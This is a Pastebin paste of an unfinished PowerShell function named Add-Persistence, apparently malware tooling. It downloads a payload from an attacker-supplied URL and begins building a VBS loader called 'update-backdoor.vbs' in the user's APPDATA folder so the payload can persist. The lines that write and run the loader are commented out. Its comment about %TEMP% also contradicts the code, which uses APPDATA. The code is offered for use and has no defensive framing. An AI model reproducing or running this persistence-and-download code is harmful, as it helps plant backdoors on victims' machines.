Advertisement
Alonnso_888

CreateBAT_Powershell

Feb 12th, 2019
183
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.25 KB | None | 0 0
  1. function Add-Persistence()
  2. {
  3. param
  4. (
  5. [parameter(Mandatory=$true)]
  6. [string]
  7. $payloadurl
  8. )
  9.  
  10. # Default saving the payload to the %TEMP% directory
  11. $tmpdir = $env:APPDATA
  12.  
  13. # Change this if desired.
  14. $payloadvbsloaderpath = "$tmpdir\update-backdoor.vbs"
  15.  
  16. # Determine if user is admin. Not required, but nice to know.
  17. $admin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
  18. if ($admin -eq $true)
  19. { Write-Host "[+] User is a local administrator!" }
  20. else
  21. { Write-Host "[-] User is not a local administrator." }
  22.  
  23. # Download and verify the payload.
  24. Write-Host "[+] Downloading payload $payloadurl"
  25. $payload = (New-Object Net.WebClient).DownloadString($payloadurl)
  26.  
  27. $payloadlength = $payload.Length
  28. if ($payloadlength -gt 0)
  29. { Write-Host "[+] Payload length: $payloadlength bytes" }
  30. else
  31. {
  32. Write-Host "[!] Payload length: 0 characters. Is the web server up?"
  33. return
  34. }
  35.  
  36. # Create the VBS file and insert the powershell command from unicorn.
  37. Write-Host "[+] Creating VBS loader."
  38. $vbs = ""
  39. # $vbs += "ps = ""$payload""`r`n"
  40. # $vbs += "oShell.run(ps),0,true"
  41. # $vbs | Out-File $payloadvbsloaderpath -Force
  42. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement